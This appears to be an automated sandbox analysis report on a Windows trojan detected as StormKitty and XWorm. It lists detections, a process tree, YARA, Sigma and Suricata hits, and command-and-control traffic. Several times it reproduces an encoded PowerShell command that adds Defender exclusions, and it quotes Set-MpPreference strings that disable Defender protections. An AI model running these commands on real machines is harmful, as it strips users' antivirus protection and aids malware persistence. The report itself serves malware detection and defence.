Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
b39wW3jYKO.exe

Overview

General Information

Sample name:b39wW3jYKO.exe
renamed because original name is a hash value
Original sample name:1b99f0bf9216a89b8320e63cbd18a292.exe
Analysis ID:1535423
MD5:1b99f0bf9216a89b8320e63cbd18a292
SHA1:6a199cb43cb4f808183918ddb6eadc760f7cb680
SHA256:5275e3db6276e5f0b85eff0c7b0282f56268646766b1566ba8f797e6ba2a9357
Tags:64exetrojan
Infos:

Detection

StormKitty, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected BrowserPasswordDump
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the document folder of the user
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • b39wW3jYKO.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\b39wW3jYKO.exe" MD5: 1B99F0BF9216A89B8320E63CBD18A292)
    • powershell.exe (PID: 736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3000 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • arndry.exe (PID: 3804 cmdline: "C:\Users\user\AppData\Local\Temp\arndry.exe" MD5: 34FB99630BAB94B3CBF92C1C6DEC493F)
      • WerFault.exe (PID: 1468 cmdline: C:\Windows\system32\WerFault.exe -u -p 3804 -s 1632 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • OneDrive.exe (PID: 3508 cmdline: "C:\Users\user\Documents\OneDrive.exe" MD5: 1B99F0BF9216A89B8320E63CBD18A292)
  • OneDrive.exe (PID: 1472 cmdline: "C:\Users\user\Documents\OneDrive.exe" MD5: 1B99F0BF9216A89B8320E63CBD18A292)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\arndry.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    C:\Users\user\AppData\Local\Temp\arndry.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\arndry.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        C:\Users\user\AppData\Local\Temp\arndry.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          C:\Users\user\AppData\Local\Temp\arndry.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x923c:$s6: VirtualBox
          • 0x919a:$s8: Win32_ComputerSystem
          • 0x9d1e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x9dbb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x9ed0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x987a:$cnc4: POST / HTTP/1.1

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000009.00000002.2501821797.000000000239D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.4647563742.000001419B000000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
            • 0x27108:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
            • 0x2a63e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
            0000000E.00000002.2657598951.0000019A3725E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  Click to see the 27 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  14.2.OneDrive.exe.19a3725ea98.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    0.2.b39wW3jYKO.exe.1419b110000.2.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
                    • 0x2a11:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
                    • 0x2a91:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x2b16:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x4c9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x4d59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x4dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x4fa1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x2faf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true
                    • 0x3067:$s2: Set-MpPreference -DisableArchiveScanning $true
                    • 0x3107:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
                    • 0x31a5:$s4: Set-MpPreference -DisableScriptScanning $true
                    • 0x322f:$s5: Set-MpPreference -SubmitSamplesConsent 2
                    • 0x329d:$s6: Set-MpPreference -MAPSReporting 0
                    • 0x3315:$s7: Set-MpPreference -HighThreatDefaultAction 6
                    • 0x33b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
                    • 0x3441:$s9: Set-MpPreference -LowThreatDefaultAction 6
                    • 0x34cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
                    • 0x3622:$e2: Add-MpPreference -ExclusionPath
                    0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
                    • 0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
                    • 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true
                    • 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true
                    • 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
                    • 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true
                    • 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2
                    • 0x509d:$s6: Set-MpPreference -MAPSReporting 0
                    • 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6
                    • 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
                    • 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6
                    • 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
                    • 0x5422:$e2: Add-MpPreference -ExclusionPath
                    8.2.OneDrive.exe.12971b90000.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      9.0.arndry.exe.1d0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        Click to see the 13 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\b39wW3jYKO.exe", ParentImage: C:\Users\user\Desktop\b39wW3jYKO.exe, ParentProcessId: 6412, ParentProcessName: b39wW3jYKO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\documents\OneDrive.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\b39wW3jYKO.exe, ProcessId: 6412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive
                        Sigma detected: Suspicious Execution of Powershell with Base64
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\b39wW3jYKO.exe", ParentImage: C:\Users\user\Desktop\b39wW3jYKO.exe, ParentProcessId: 6412, ParentProcessName: b39wW3jYKO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\b39wW3jYKO.exe", ParentImage: C:\Users\user\Desktop\b39wW3jYKO.exe, ParentProcessId: 6412, ParentProcessName: b39wW3jYKO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-17T00:23:06.941004+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:23:12.347752+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:23:19.705273+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:23:32.761969+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:23:42.378257+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:23:45.595824+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:23:53.174489+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:01.249800+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:06.549829+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:06.612323+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:09.206233+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:12.381741+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:17.744448+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:22.472275+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
